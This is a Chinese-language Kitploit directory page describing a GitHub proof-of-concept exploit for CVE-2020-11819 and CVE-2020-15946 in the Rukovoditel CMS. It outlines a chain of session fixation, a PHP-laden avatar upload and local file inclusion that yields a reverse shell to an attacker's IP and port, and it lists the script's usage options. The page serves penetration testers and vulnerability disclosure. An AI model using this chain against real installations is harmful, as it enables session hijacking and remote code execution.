Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-RCE-Rukovoditel — CVE-2020-11819 和 CVE-2020-15946 的概念验证 | Kitploit
工具/GitHubGitHub/danyx07/poc-rce-rukovoditel
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

CVE-2020-11819 和 CVE-2020-15946 的概念验证

查看仓库
5年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC-RCE-Rukovoditel

针对 CVE-2020-11819 和 CVE-2020-15946 的概念验证。已在 Rukovoditel 2.4.x、2.5.x 和 2.6.1 上测试。

描述:

此漏洞利用工具有两种执行模式:一种是利用会话固定漏洞(CVE-2020-15946),另一种是利用任意配置文件下任意账户的访问凭据。 使用 --type L 选项时,该脚本会创建一个恶意链接,如果受害者在浏览器中访问该链接,将设置一个任意的会话标识符,用于在其头像上传带有 PHP 内容的图片后窃取其会话,然后利用本地文件包含(CVE-2020-11819)获得一个反向 shell;或者,使用 --type C -u -p 选项提供凭据,加载带有 PHP 内容的图片,并利用本地文件包含(CVE-2020-11819)实现代码执行。

小提示:记得检查注册模块是否已启用 ;)

用法

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

Rukovoditel 认证后 RCE 脚本,版本 1.0

可选参数:
-h, --help 显示此帮助信息并退出
-t URL, --target URL CMS Rukovoditel 的 URL/完整路径 http://url/path/to/cms/
-u USER, --user USER 用于认证的用户名
-p PASSWORD, --password PASSWORD 用于认证的密码
-a TYPE, --type TYPE 使用 -a L 生成链接并窃取会话,或使用 -a C(如果您拥有 Web 应用程序的访问凭据)
--ip IP_ATTACKER 用于反向 shell 的攻击者 IP!
--port PORT_ATTACKER 反向 shell 连接端口
--proxy PROXY 设置用于调试的 http 代理 http://127.0.0.1:8080

下载工具